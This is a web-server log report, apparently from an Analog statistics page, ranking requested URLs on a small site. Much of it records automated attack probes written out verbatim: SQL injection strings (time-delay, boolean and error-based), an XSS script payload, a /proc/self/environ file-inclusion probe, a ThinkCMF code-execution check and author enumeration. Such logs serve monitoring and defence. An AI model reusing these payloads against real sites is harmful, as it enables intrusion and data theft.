29 | /March2012.html/?lang=/proc/self/environ%0000'\" |
27 | /March2012.html/?lang=/proc/self/environ%0000'\"' |
14 | /March2012.html/?lang=/proc/self/environ%0000'\"'A=0 |
11 | /March2012.html/?lang=/proc/self/environ%250000%2527%255C%2522 |
183 | /May2014.html/trackback/ |
172 | /usage/April2013/ref_201304.phtml/trackback/ |
10 | /usage/April2013/ref_201304.phtml/trackback/?rct=j%2526frm%253D1%2526q%253D%2526esrc%253Ds%2526sa%253DU%2526ved%253D0ahUKEwjFkKbP657dAhUkBsAKHb2-Cjc4ChAWCDwwCA%2526usg%253DAOvVaw1NtUfOBeacxb8B-unYNMwp |
144 | /html/ |
143 | /ads.txt |
198942 | [not listed: 101,700 files] |
(Go To: Top | General Summary | Yearly Report | Quarterly Report | Monthly Report | Weekly Report | Daily Report | Daily Summary | Hourly Report | Hour of the Week Summary | Hourly Summary | Quarter-Hour Report | Quarter-Hour Summary | Five-Minute Report | Five-Minute Summary | Domain Report | Organisation Report | Host Report | Host Redirection Report | Host Failure Report | User Report | User Redirection Report | User Failure Report | Redirected Referrer Report | Failed Referrer Report | Referrer Report | Referring Site Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Redirection Report | Failure Report | Request Report)
This report lists the files on the site.
Listing files with at least 20 requests, sorted by the number of requests.
reqs | %bytes | last time | file |
---|---|---|---|
215313 | 31.93% | 1/Oct/25 02:21 | /January3014.html |
24 | 30/Sep/25 22:28 | /January3014.html?t=-6540 | |
24 | 30/Sep/25 15:08 | /January3014.html?amp;amp;l=en')) AND 8845=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (8845=8845) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND (('QXfZ'='QXfZ&position=37&query=site.php%3Fdist= registration | |
23 | 30/Sep/25 23:58 | /January3014.html?l=(CASE+WHEN+6150%3D1407+THEN+6150+ELSE+NULL+END) | |
22 | 30/Sep/25 23:40 | /January3014.html?l=en%3BWAITFOR+DELAY+'0:0:32'-- | |
22 | 30/Sep/25 23:49 | /January3014.html?position=37%25'+ORDER+BY+9847--+Wkkt | |
22 | 30/Sep/25 23:25 | /January3014.html?t=-2620"+OR+2708%3D7263--+ybcd | |
22 | 30/Sep/25 23:48 | /January3014.html?position=37)%3BSELECT+PG_SLEEP(32)-- | |
21 | 1/Oct/25 00:02 | /January3014.html?t=-8777'+OR+5301%3D5301+AND+'vlBJ'+LIKE+'vlBJ | |
20 | 30/Sep/25 23:11 | /January3014.html?l=en)+AND+4150%3D1444--+lfpo | |
20 | 30/Sep/25 23:55 | /January3014.html?l=en")+AND+3056%3D8343+AND+("jWHo"%3D"jWHo | |
20 | 30/Sep/25 23:43 | /January3014.html?t=-3304'+OR+7104%3D8377--+oZDu | |
20 | 1/Oct/25 01:21 | /January3014.html?l=-3297)+OR+7925%3D7925+AND+(9270%3D9270 | |
20 | 30/Sep/25 23:50 | /January3014.html?position=37%3BWAITFOR+DELAY+'0:0:32'-- | |
20 | 30/Sep/25 23:55 | /January3014.html?l=en'+AND+8854%3D9072+AND+'vZRR'%3D'vZRR | |
19 | 30/Sep/25 23:05 | /January3014.html?l=en'))+ORDER+BY+2981# | |
19 | 30/Sep/25 23:58 | /January3014.html?l=-4958')+OR+5453%3D2576+AND+('QhEK'%3D'QhEK | |
19 | 30/Sep/25 23:53 | /January3014.html?position=37"+AND+1733%3D7804+AND+"aJzA"%3D"aJzA | |
19 | 30/Sep/25 22:58 | /January3014.html?l=en))+ORDER+BY+1590# | |
19 | 30/Sep/25 23:55 | /January3014.html?position=-7535))+OR+6493%3D2389+AND+((9716%3D9716 | |
19 | 1/Oct/25 00:08 | /January3014.html?position=37'%3BDECLARE+@x+CHAR(9)%3BSET+@x%3D0x303a303a332%3BWAITFOR+DELAY+@x-- | |
19 | 1/Oct/25 00:04 | /January3014.html?position=37%25'%3BSELECT+COUNT(*)+FROM+GENERATE_SERIES(1,32000000)-- | |
18 | 30/Sep/25 23:25 | /January3014.html?l=en&position=37')%3BSELECT+SLEEP(32) | |
18 | 1/Oct/25 00:04 | /January3014.html?position=-3496'))+OR+3462%3D3462+AND+(('mszI'%3D'mszI | |
18 | 30/Sep/25 23:56 | /January3014.html?position=37")+AND+2930%3D4275+AND+("qcKy"%3D"qcKy | |
18 | 30/Sep/25 23:35 | /January3014.html?l=en'))+AND+4685%3D4260--+gzuR | |
18 | 30/Sep/25 22:42 | /January3014.html?l=-5441+OR+6498%3D6821 | |
17 | 30/Sep/25 23:47 | /January3014.html?position=-6838'+OR+4626%3D3944--+szlh | |
17 | 1/Oct/25 00:06 | /January3014.html?position=-6857')+OR+3590%3D2554+AND+('wOPy'+LIKE+'wOPy | |
17 | 30/Sep/25 23:01 | /January3014.html?l=en")+ORDER+BY+6699# | |
17 | 30/Sep/25 23:44 | /January3014.html?l=en'))+ORDER+BY+3414--+EBNg | |
17 | 1/Oct/25 00:02 | /January3014.html?position=(CASE+WHEN+7459%3D7459+THEN+7459+ELSE+NULL+END) | |
17 | 1/Oct/25 00:03 | /January3014.html?query=-6144'))+OR+6567%3D1440+AND+(('XeIm'%3D'XeIm | |
17 | 30/Sep/25 23:57 | /January3014.html?l=-9818%25'+OR+4391%3D1342+AND+'XulL%25'%3D'XulL | |
17 | 30/Sep/25 23:46 | /January3014.html?position=37%25'+AND+5177%3D3672--+gANU | |
16 | 1/Oct/25 01:18 | /January3014.html?query=-1000%25'+OR+8321%3D8321+AND+'lgBY%25'%3D'lgBY | |
16 | 30/Sep/25 22:59 | /January3014.html?l=en'+ORDER+BY+6660# | |
16 | 30/Sep/25 23:55 | /January3014.html?query=-9256"+OR+4206%3D7294+AND+"rOEz"%3D"rOEz | |
16 | 1/Oct/25 01:36 | /January3014.html?position=37)+ORDER+BY+8911# | |
16 | 1/Oct/25 00:07 | /January3014.html?position=37+RLIKE+(SELECT+(CASE+WHEN+(1138%3D8264)+THEN+37+ELSE+0x28+END)) | |
16 | 30/Sep/25 23:47 | /January3014.html?t=-6599))+OR+6035%3D6831--+yMXC | |
16 | 30/Sep/25 23:53 | /January3014.html?t=-7448"+OR+5301%3D5301+AND+"jwaE"%3D"jwaE | |
16 | 1/Oct/25 00:43 | /January3014.html?position=37%25'+AND+9153%3D7405--+MKzU | |
16 | 30/Sep/25 23:45 | /January3014.html?t=-1693))+OR+6235%3D6235--+xCQp | |
16 | 30/Sep/25 10:44 | /January3014.html?t=-1019') | |
16 | 1/Oct/25 00:11 | /January3014.html?query=(CASE+WHEN+(7375%3D4922)+THEN+7375+ELSE+7375*(SELECT+7375+FROM+DUAL+UNION+SELECT+4922+FROM+DUAL)+END) | |
16 | 30/Sep/25 22:42 | /January3014.html?l=-4602+OR+7925%3D7925 | |
16 | 30/Sep/25 23:45 | /January3014.html?position=-9782"+OR+6661%3D7419--+wUIs | |
16 | 1/Oct/25 00:00 | /January3014.html?t=\x22><script+>alert(String.fromCharCode(88,83,83))</script> | |
16 | 30/Sep/25 23:17 | /January3014.html?position=37")+ORDER+BY+1# | |
16 | 30/Sep/25 23:04 | /January3014.html?position=37"+ORDER+BY+4827# | |
16 | 30/Sep/25 23:01 | /January3014.html?l=en')+ORDER+BY+9176# | |
16 | 30/Sep/25 23:34 | /January3014.html?l=en")+ORDER+BY+9407--+tYhi | |
16 | 30/Sep/25 23:50 | /January3014.html?position=37)+AND+8132%3D1674+AND+(6715%3D6715 | |
15 | 1/Oct/25 00:01 | /January3014.html?l=en')+AND+3953%3D9171+AND+('KrVO'+LIKE+'KrVO | |
15 | 30/Sep/25 23:39 | /January3014.html?t=-9290')+OR+5546%3D3181--+Nwpp | |
15 | 30/Sep/25 23:39 | /January3014.html?l=-7209)+OR+2927%3D2927--+MXOC | |
15 | 30/Sep/25 23:10 | /January3014.html?query=-2666"+OR+9703%3D9703--+ndie | |
15 | 1/Oct/25 00:11 | /January3014.html?l=en'))+RLIKE+(SELECT+(CASE+WHEN+(9079%3D8782)+THEN+0x656e+ELSE+0x28+END))+AND+(('qiHb'%3D'qiHb | |
15 | 30/Sep/25 23:56 | /January3014.html?l=en'))+AND+4873%3D5403+AND+(('PFna'%3D'PFna | |
15 | 30/Sep/25 23:45 | /January3014.html?l=en+ORDER+BY+6131# | |
14 | 30/Sep/25 23:34 | /January3014.html?l=en))%3BSELECT+PG_SLEEP(32)-- | |
14 | 1/Oct/25 00:00 | /January3014.html?query=\x22><script+>alert(String.fromCharCode(88,83,83))</script> | |
14 | 30/Sep/25 23:17 | /January3014.html?position=37'+ORDER+BY+2376# | |
14 | 30/Sep/25 23:59 | /January3014.html?l=en%25'%3BSELECT+COUNT(*)+FROM+GENERATE_SERIES(1,32000000)-- | |
14 | 30/Sep/25 23:10 | /January3014.html?position=37%3BSELECT+SLEEP(32)# | |
14 | 30/Sep/25 23:34 | /January3014.html?position=37+AND+5118%3D5118--+ZLPr | |
14 | 30/Sep/25 23:05 | /January3014.html?l=en+AND+9968%3D5207--+YKTt | |
14 | 30/Sep/25 23:59 | /January3014.html?position=-4218"+OR+7866%3D9408+AND+"yxNf"%3D"yxNf | |
14 | 30/Sep/25 23:52 | /January3014.html?position=37")%3BWAITFOR+DELAY+'0:0:32'-- | |
14 | 1/Oct/25 00:13 | /January3014.html?l=en'+AND+(SELECT+(CASE+WHEN+(2049%3D3848)+THEN+NULL+ELSE+CTXSYS.DRITHSX.SN(1,2049)+END)+FROM+DUAL)+IS+NULL+AND+'WTLt'+LIKE+'WTLt | |
14 | 30/Sep/25 23:26 | /January3014.html?l=en))+AND+6606%3D7877--+OSRF | |
14 | 30/Sep/25 23:26 | /January3014.html?l=en&position=37))%3BSELECT+SLEEP(32) | |
14 | 30/Sep/25 23:48 | /January3014.html?l=en")%3BWAITFOR+DELAY+'0:0:32'-- | |
14 | 1/Oct/25 00:00 | /January3014.html?position=-4014'+OR+3462%3D3462+AND+'kUZa'%3D'kUZa | |
14 | 1/Oct/25 00:03 | /January3014.html?t=-1287'))+OR+5301%3D5301+AND+(('VRjG'%3D'VRjG | |
14 | 30/Sep/25 23:48 | /January3014.html?t=-6716'))+OR+6235%3D6235--+bbLl | |
14 | 30/Sep/25 23:58 | /January3014.html?l=(CASE+WHEN+7440%3D7440+THEN+7440+ELSE+NULL+END) | |
14 | 30/Sep/25 23:46 | /January3014.html?position=37%25'+ORDER+BY+1--+pmcp | |
14 | 30/Sep/25 23:57 | /January3014.html?l=en'))+AND+5299%3D5299+AND+(('JZGd'%3D'JZGd | |
14 | 30/Sep/25 20:13 | /January3014.html?l=en&position=37&query=-3754)+OR+9095%3D1041+AND+(1931%3D1931 | |
14 | 1/Oct/25 00:11 | /January3014.html?l=en+AND+EXTRACTVALUE(7703,CONCAT(0x5c,0x71627a7071,(SELECT+(ELT(7703%3D7703,1))),0x71717a7871))--+sKoe | |
14 | 1/Oct/25 00:10 | /January3014.html?t=(SELECT+(CASE+WHEN+(3792%3D7101)+THEN+'/etc/passwd'+ELSE+(SELECT+7101+UNION+SELECT+5217)+END)) | |
14 | 30/Sep/25 18:30 | /January3014.html?l=en&position=37&query=site.php%3Fdist%3D+registration")+AND+9559%3D1926--+aRJB | |
13 | 30/Sep/25 23:02 | /January3014.html?l=en%25'+ORDER+BY+6949# | |
13 | 30/Sep/25 15:12 | /January3014.html?position=-7831')+OR+3462%3D3462+AND+('bCUI'%3D'bCUI | |
13 | 29/Sep/25 20:03 | /January3014.html?position=37'+ORDER+BY+2354# | |
13 | 29/Sep/25 19:06 | /January3014.html?position=37'+ORDER+BY+4038--+upDW | |
13 | 1/Oct/25 00:08 | /January3014.html?l=en)%3BDECLARE+@x+CHAR(9)%3BSET+@x%3D0x303a303a332%3BWAITFOR+DELAY+@x-- | |
13 | 30/Sep/25 23:54 | /January3014.html?l=-4441"+OR+2572%3D8985+AND+"dibt"%3D"dibt | |
13 | 30/Sep/25 17:46 | /January3014.html?l=en'+ORDER+BY+5589--+rSnP | |
13 | 30/Sep/25 23:49 | /January3014.html?position=37'%3BSELECT+PG_SLEEP(32)-- | |
13 | 1/Oct/25 00:24 | /January3014.html?query=-6205"+OR+8321%3D8321+AND+"gFTC"%3D"gFTC | |
13 | 30/Sep/25 21:12 | /January3014.html?l=en+AND+5299%3D5299--+QZOX | |
13 | 29/Sep/25 19:48 | /January3014.html?l=en'+RLIKE+(SELECT+(CASE+WHEN+(4998%3D4998)+THEN+0x656e+ELSE+0x28+END))+AND+'LDjt'+LIKE+'LDjt | |
13 | 1/Oct/25 00:03 | /January3014.html?position=37)%3BSELECT+COUNT(*)+FROM+GENERATE_SERIES(1,32000000)-- | |
13 | 30/Sep/25 08:31 | /January3014.html?l=en"+ORDER+BY+2180# | |
13 | 1/Oct/25 02:13 | /January3014.html?position=37,(SELECT+(CASE+WHEN+(8029%3D8029)+THEN+1+ELSE+1/(SELECT+0)+END)) | |
13 | 1/Oct/25 00:04 | /January3014.html?position=37")%3BSELECT+COUNT(*)+FROM+GENERATE_SERIES(1,32000000)-- | |
13 | 30/Sep/25 04:10 | /January3014.html?position=37")+AND+5118%3D5118+AND+("gYtK"%3D"gYtK | |
13 | 30/Sep/25 00:55 | /January3014.html?position=37'+AND+4744%3D6215+AND+'Zech'%3D'Zech | |
13 | 30/Sep/25 08:21 | /January3014.html?position=37)%3BWAITFOR+DELAY+'0:0:32'-- | |
13 | 29/Sep/25 23:21 | /January3014.html?t=-4364))+OR+5301%3D5301+AND+((4623%3D4623 | |
13 | 1/Oct/25 00:01 | /January3014.html?l=en'))%3BSELECT+COUNT(*)+FROM+GENERATE_SERIES(1,32000000)-- | |
13 | 30/Sep/25 13:14 | /January3014.html?position=37')+AND+5118%3D5118+AND+('zqgg'+LIKE+'zqgg | |
12 | 30/Sep/25 06:56 | /January3014.html?l=en')+AND+1405%3D6935--+yqUn | |
12 | 30/Sep/25 21:24 | /January3014.html?t=-1241')+OR+5171%3D9880+AND+('pXmF'+LIKE+'pXmF | |
12 | 30/Sep/25 23:53 | /January3014.html?t=-9765))+OR+4766%3D2014+AND+((4198%3D4198 | |
12 | 1/Oct/25 00:02 | /January3014.html?position='nvOpzp%3B+AND+1%3D1+OR+(<'">iKO)), | |
12 | 30/Sep/25 06:52 | /January3014.html?position=(SELECT+CONCAT(CONCAT('qbzpq',(CASE+WHEN+(5254%3D5254)+THEN+'1'+ELSE+'0'+END)),'qqzxq')) | |
12 | 30/Sep/25 23:05 | /January3014.html?l=en"+AND+7660%3D9968--+PyfU | |
12 | 30/Sep/25 23:54 | /January3014.html?position=37))+AND+5118%3D5118+AND+((1609%3D1609 | |
12 | 30/Sep/25 23:33 | /January3014.html?query=-8642"+OR+8041%3D8082--+gLXh | |
12 | 30/Sep/25 23:35 | /January3014.html?l=en')%3BSELECT+PG_SLEEP(32)-- | |
12 | 30/Sep/25 23:50 | /January3014.html?l=-4707'))+OR+2927%3D2927--+pWfu | |
12 | 1/Oct/25 00:10 | /January3014.html?position=37+AND+EXTRACTVALUE(9581,CONCAT(0x5c,0x71627a7071,(SELECT+(ELT(9581%3D9581,1))),0x71717a7871)) | |
12 | 30/Sep/25 03:04 | /January3014.html?l=en'+ORDER+BY+7014# | |
12 | 30/Sep/25 23:51 | /January3014.html?l=en")+AND+7947%3D6896+AND+("ajah"%3D"ajah | |
12 | 1/Oct/25 00:01 | /January3014.html?query=-1013'+OR+7814%3D7290+AND+'LOYz'+LIKE+'LOYz | |
12 | 30/Sep/25 23:52 | /January3014.html?position=-8177)+OR+3408%3D8725+AND+(1492%3D1492 | |
12 | 30/Sep/25 17:33 | /January3014.html?l=en")+AND+(SELECT+(CASE+WHEN+(4516%3D8137)+THEN+NULL+ELSE+CTXSYS.DRITHSX.SN(1,4516)+END)+FROM+DUAL)+IS+NULL+AND+("JjQJ"%3D"JjQJ&position=37&query=site.php%3Fdist%3D+registration | |
12 | 30/Sep/25 23:44 | /January3014.html?l=en'))%3BSELECT+PG_SLEEP(32)-- | |
12 | 30/Sep/25 23:17 | /January3014.html?l=en'))%3BSELECT+SLEEP(32)# | |
12 | 29/Sep/25 17:31 | /January3014.html?position=37%25'+AND+8841%3D4159+AND+'YKSz%25'%3D'YKSz | |
12 | 29/Sep/25 18:18 | /January3014.html?l=en'))+AND+8656%3D8656--+zKIV | |
12 | 30/Sep/25 21:58 | /January3014.html?l=en")+RLIKE+(SELECT+(CASE+WHEN+(4818%3D2412)+THEN+0x656e+ELSE+0x28+END))+AND+("Mjqs"%3D"Mjqs | |
12 | 1/Oct/25 00:05 | /January3014.html?position=-6023'))+OR+9917%3D5385+AND+(('hFYt'%3D'hFYt | |
12 | 30/Sep/25 06:09 | /January3014.html?l=en&position=37&query=-1543))+OR+3831%3D7114+AND+((8830%3D8830 | |
12 | 30/Sep/25 23:46 | /January3014.html?query=-2823")+OR+9703%3D9703--+VMcL | |
12 | 1/Oct/25 00:12 | /January3014.html?l=(SELECT+CONCAT(CONCAT('qbzpq',(CASE+WHEN+(9260%3D9260)+THEN+'1'+ELSE+'0'+END)),'qqzxq')) | |
12 | 30/Sep/25 21:48 | /January3014.html?position=37"%3BWAITFOR+DELAY+'0:0:32'-- | |
11 | 25/Sep/25 18:52 | /January3014.html?position=37")%3BSELECT+SLEEP(32)# | |
11 | 26/Sep/25 01:40 | /January3014.html?l=en")+AND+1734%3D9962--+ywsi | |
11 | 27/Sep/25 21:49 | /January3014.html?t=(CASE+WHEN+3824%3D9020+THEN+3824+ELSE+NULL+END) | |
11 | 26/Sep/25 05:18 | /January3014.html?l='nvOpzp%3B+AND+1%3D1+OR+(<'">iKO)), | |
11 | 30/Sep/25 14:53 | /January3014.html?l=-8981'+OR+4168%3D8045+AND+'MPuU'+LIKE+'MPuU | |
11 | 30/Sep/25 03:38 | /January3014.html?position=37")+AND+7270%3D7270--+mpAA | |
11 | 29/Sep/25 08:00 | /January3014.html?query=-9566")+OR+2764%3D8670+AND+("kNud"%3D"kNud | |
11 | 29/Sep/25 10:54 | /January3014.html?l=en"+AND+5299%3D5299+AND+"tdxD"%3D"tdxD | |
11 | 28/Sep/25 22:28 | /January3014.html?position=37"+AND+5479%3D8701--+nrOB | |
11 | 26/Sep/25 10:25 | /January3014.html?position=37)+AND+6981%3D4458--+FntE | |
11 | 30/Sep/25 09:24 | /January3014.html?l=en')+ORDER+BY+9349 | |
11 | 28/Sep/25 09:12 | /January3014.html?position=37%25'%3BSELECT+PG_SLEEP(32)-- | |
11 | 27/Sep/25 05:16 | /January3014.html?position=37)%3BSELECT+SLEEP(32)# | |
11 | 29/Sep/25 05:35 | /January3014.html?query=-1543))+OR+3831%3D7114+AND+((8830%3D8830 | |
11 | 1/Oct/25 01:08 | /January3014.html?position=37)+ORDER+BY+1--+JsVc | |
11 | 26/Sep/25 15:07 | /January3014.html?position=37'))%3BSELECT+PG_SLEEP(32)-- | |
11 | 26/Sep/25 02:33 | /January3014.html?position=37")+ORDER+BY+2171--+MgYb | |
11 | 26/Sep/25 02:10 | /January3014.html?query=-8374'+OR+4912%3D9043+AND+'YVWw'%3D'YVWw | |
11 | 28/Sep/25 07:53 | /January3014.html?position=37')+ORDER+BY+2912--+oSVR | |
11 | 30/Sep/25 19:58 | /January3014.html?position=-8908+OR+3462%3D3462--+ccBK | |
11 | 26/Sep/25 06:30 | /January3014.html?l=en')+AND+8656%3D8656--+EQNS | |
11 | 27/Sep/25 20:51 | /January3014.html?position=-6468))+OR+2659%3D4736--+POGs | |
11 | 26/Sep/25 02:26 | /January3014.html?position=37)+ORDER+BY+1# | |
11 | 29/Sep/25 05:46 | /January3014.html?position=37"+AND+1728%3D1160--+vyOT | |
11 | 25/Sep/25 22:11 | /January3014.html?l=en'+AND+1871%3D7534+AND+'WjRq'+LIKE+'WjRq | |
11 | 27/Sep/25 09:25 | /January3014.html?l=en")+AND+5299%3D5299+AND+("LEYP"%3D"LEYP | |
11 | 27/Sep/25 21:11 | /January3014.html?l=en')+AND+6372%3D1767+AND+('idqv'%3D'idqv | |
11 | 30/Sep/25 12:56 | /January3014.html?position=37+OR+EXTRACTVALUE(5919,CONCAT(0x5c,0x71627a7071,(SELECT+(ELT(5919%3D5919,1))),0x71717a7871)) | |
11 | 26/Sep/25 10:09 | /January3014.html?l=en%3BSELECT+SLEEP(32)# | |
11 | 28/Sep/25 16:51 | /January3014.html?position=37"+AND+4792%3D8677+AND+"VOdb"%3D"VOdb | |
11 | 26/Sep/25 00:41 | /January3014.html?l=en)+ORDER+BY+1--+jttP | |
11 | 28/Sep/25 05:52 | /January3014.html?position=37'))+ORDER+BY+1--+MshT | |
11 | 30/Sep/25 22:33 | /January3014.html?l=en' AND 8854%3D9072 AND 'vZRR'%3D'vZRR | |
11 | 29/Sep/25 16:39 | /January3014.html?t=(CASE+WHEN+(1419%3D1751)+THEN+1419+ELSE+1419*(SELECT+1419+FROM+DUAL+UNION+SELECT+1751+FROM+DUAL)+END) | |
10 | 28/Sep/25 18:23 | /January3014.html?l=en%25'+AND+8656%3D8656--+OumX | |
10 | 25/Sep/25 22:01 | /January3014.html?query=-6944%25'+OR+9703%3D9703--+oLnc | |
10 | 28/Sep/25 10:36 | /January3014.html?l=en)%3BSELECT+PG_SLEEP(32)-- | |
10 | 29/Sep/25 08:48 | /January3014.html?l=en')+ORDER+BY+1# | |
10 | 30/Sep/25 07:34 | /January3014.html?l=4317 | |
10 | 26/Sep/25 03:24 | /January3014.html?position=37'+AND+5448%3D5542+AND+'bKHK'+LIKE+'bKHK | |
10 | 29/Sep/25 11:47 | /January3014.html?position=37%25'+ORDER+BY+2686# | |
10 | 28/Sep/25 21:59 | /January3014.html?query=-2204")+OR+8321%3D8321+AND+("NmpV"%3D"NmpV | |
10 | 28/Sep/25 21:57 | /January3014.html?query=-1767))+OR+8587%3DCAST((CHR(113)||CHR(98)||CHR(122)||CHR(112)||CHR(113))||(SELECT+(CASE+WHEN+(8587%3D8587)+THEN+1+ELSE+0+END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(120)||CHR(113))+AS+NUMERIC)+AND+((2467%3D2467 | |
10 | 29/Sep/25 19:58 | /January3014.html?l=en%25'+ORDER+BY+1--+QMDs | |
10 | 29/Sep/25 06:34 | /January3014.html?position=37+AND+6918%3D9120--+HjWv | |
10 | 29/Sep/25 12:27 | /January3014.html?l=en&position=37'+RLIKE+(SELECT+(CASE+WHEN+(4243%3D4739)+THEN+37+ELSE+0x28+END))+AND+'seiw'%3D'seiw&query=site.php%3Fdist%3D+registration | |
10 | 28/Sep/25 15:28 | /January3014.html?position=37')+ORDER+BY+6763--+YZxM | |
10 | 29/Sep/25 04:51 | /January3014.html?l=en&position=37&query=site.php%3Fdist%3D+registration')+OR+(SELECT+7693+FROM(SELECT+COUNT(*),CONCAT(0x71627a7071,(SELECT+(ELT(7693%3D7693,1))),0x71717a7871,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)+AND+('LUDn'%3D'LUDn | |
10 | 30/Sep/25 23:34 | /January3014.html?t=-8866')+OR+5301%3D5301+AND+('uxuF'%3D'uxuF | |
10 | 30/Sep/25 10:38 | /January3014.html?position=37'+AND+8429%3D7974--+oCPZ | |
10 | 25/Sep/25 13:26 | /January3014.html?l=en&position=37&query=site.php%3Fdist%3D+registration%3BSELECT+SLEEP(32) | |
10 | 28/Sep/25 18:24 | /January3014.html?l=en'+AND+4736%3D6653+AND+'bDLj'+LIKE+'bDLj | |
10 | 28/Sep/25 06:11 | /January3014.html?l=en))+AND+8656%3D8656--+wdeG | |
37121 | 0.60% | 1/Oct/25 02:15 | / |
2032 | 0.04% | 1/Oct/25 01:50 | /?q=node/add |
1598 | 0.03% | 1/Oct/25 01:11 | /?q=user |
81 | 1/Oct/25 01:38 | /?author=15 | |
80 | 1/Oct/25 01:11 | /?author=3 | |
80 | 30/Sep/25 18:44 | /?author=8 | |
78 | 30/Sep/25 16:04 | /?author=13 | |
78 | 30/Sep/25 13:51 | /?author=2 | |
78 | 30/Sep/25 13:51 | /?author=7 | |
78 | 30/Sep/25 18:11 | /?author=9 | |
77 | 30/Sep/25 22:45 | /?author=10 | |
77 | 1/Oct/25 00:37 | /?author=12 | |
77 | 30/Sep/25 18:39 | /?author=4 | |
74 | 30/Sep/25 14:17 | /?author=17 | |
73 | 30/Sep/25 13:52 | /?author=16 | |
73 | 30/Sep/25 16:25 | /?author=18 | |
72 | 30/Sep/25 13:52 | /?author=14 | |
72 | 30/Sep/25 13:52 | /?author=19 | |
72 | 30/Sep/25 13:52 | /?author=20 | |
72 | 30/Sep/25 13:51 | /?author=6 | |
71 | 30/Sep/25 21:18 | /?author=5 | |
70 | 30/Sep/25 13:51 | /?author=1 | |
69 | 1/Oct/25 00:20 | /?author=11 | |
64 | 30/Sep/25 23:52 | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | |
56 | 30/Sep/25 22:02 | /?q | |
53 | 30/Sep/25 19:55 | /?act=dispBoardWrite&mid=qna | |
53 | 27/Sep/25 18:06 | /?f=search&keyword=aaa'or updatexml(1,concat(1,md5(1)),1)#&m=index | |
47 | 1/Oct/25 02:14 | /?phpinfo=-1 | |
45 | 30/Sep/25 14:45 | /?/ | |
45 | 1/Oct/25 00:16 | /?fp=SUxk7FxHpuP30ygW2i+0XwuQFkzG8Dv+JmKUikEWRNjJ5a6zzKM93zmdTSjk2uBWZmmEIzVmg/vUGAQDEmHS4A%3D%3D&poru=XfERbEnjeH+8VN85+YQ2IIWxIMBIL4QZVag3/tOxRLJlu2nSS6qt7dy&prvtof=hytJZmQ5aiTdApgc4nWQIIPlkxZBRgP3pOUFNxrb2Fs%3D | |
41 | 1/Oct/25 00:15 | /?fp=oBKWNMR+w/hT9I2zcmJ7XB48cMhWJLqEbDJY3HGvDKupMiT8Zc1Zptmcgql8f3gorr30UdpcbboY2xyeLfogDw%3D%3D&poru=Gj9TYuL2jhbzO17tQKwQBc3EftodOOuteLoKQY9Cbob6fc7P/P3OrFE14G/k0FXb0C7QuAJyhBRaooyVhPG6Dkp7MdgG69wGeVuCPSAHdC8%3D&prvtof=gkAtfapr+qBr0dkbY0Tgeql1Y6qKETY/eQBH6evShwQ%3D | |
40 | 1/Oct/25 00:15 | /?fp=EfdBgARY2l7w501W2luoic/+FAoGpOOH+aQAmS4n7FhPg6djEA0kUrUrQyX/vKI6vsB2f3Vzd+1Q9d1UyRC7kA%3D%3D&poru=KPkXB08e/ojOsPugOIcT9pCi8zOhxabGIFm19LrND8McoivK+Y4GW0WzFJFUXnHYC8l4qoizKRwX1nDf0lvGxIRTVGx/ju9GI4ROY7TTLPs%3D&prvtof=fgfShtvcrwmBs/bsgK3dlL32487jkTNwI0W/Vt2agyg%3D | |
40 | 29/Sep/25 23:25 | /?s=index/ | |
37 | 1/Oct/25 00:14 | /?fp=CRQxsqwddyRYq1rRnPJdHCe5tngiC3YVU94nWIV8eEUu60xW00bfY7p3ED4OjcGnD/TzehTLgftBemV7f4s3cw%3D%3D&poru=bSuYcmKVYPYURIv1BbP9tMAlVVQLeCS2te2GZxpSPMHmPT265IiYSSlsSKLd8rvDWU7GR8ChROau4ylZxnnd6Q%3D%3D&prvtof=zf1cGfrN9RLN0lSlpKwkuXv+lmlwyzIu9umsgl9uVPo%3D | |
37 | 30/Sep/25 17:52 | /?amp=328&mode=getshouts | |
36 | 1/Oct/25 00:14 | /?fp=oBKWNMR+w/hT9I2zcmJ7XB48cMhWJLqEbDJY3HGvDKupMiT8Zc1Zptmcgql8f3gorr30UdpcbboY2xyeLfogDw%3D%3D&prvtof=gkAtfapr+qBr0dkbY0Tgeql1Y6qKETY/eQBH6evShwQ%3D | |
36 | 30/Sep/25 13:17 | /?redirect:$ | |
36 | 1/Oct/25 01:06 | /?C=S | |
35 | 30/Sep/25 11:50 | /?amp;amp;amp;keyword=aaa'or updatexml(1,concat(1,md5(1)),1)#&amp;m=index&f=search | |
34 | 30/Sep/25 21:15 | /?layout=confirm&option=com_user&view=reset | |
34 | 1/Oct/25 00:16 | /?fp=VVW3zxnBUIOpV99JURNyRtnt86a6KsxgTYhc3iw1YOKeGobsf+Rfk3/7lC8xVY29B/FbkRXZ727X/oroEK+Y6w%3D%3D&poru=4ZqFAgov7j5LlMSSaHY0GJb2z1Lo2k5wU/q9maLSwZYsbsHDwJ0IdGi&prvtof=2iDowtJuUi5ndCiT0207nt07h4UdpLB7rBIWqfHxPgI%3D | |
34 | 30/Sep/25 00:46 | /?q=user/register | |
34 | 30/Sep/25 22:42 | /?XDEBUG_SESSION_START=phpstorm | |
33 | 30/Sep/25 11:45 | /?phpinfo=1 | |
33 | 1/Oct/25 00:12 | /?User-Agent=Mozilla/5.0+(Linux%3B+U%3B+Android+4.0.3%3B+zh-cn%3B+M032+Build/IML74K)+UC+AppleWebKit/534.31+(KHTML,+like+Gecko)+Mobile+Safari/534.31%0A | |
33 | 30/Sep/25 15:57 | /?page=gourlfile | |
33 | 30/Sep/25 18:48 | /?pFBust=1404669916687 | |
32 | 30/Sep/25 22:30 | /?agreed=true&iscanyesno=yeswecan&mode=register | |
32 | 1/Oct/25 02:13 | /?amp=288&mode=4 | |
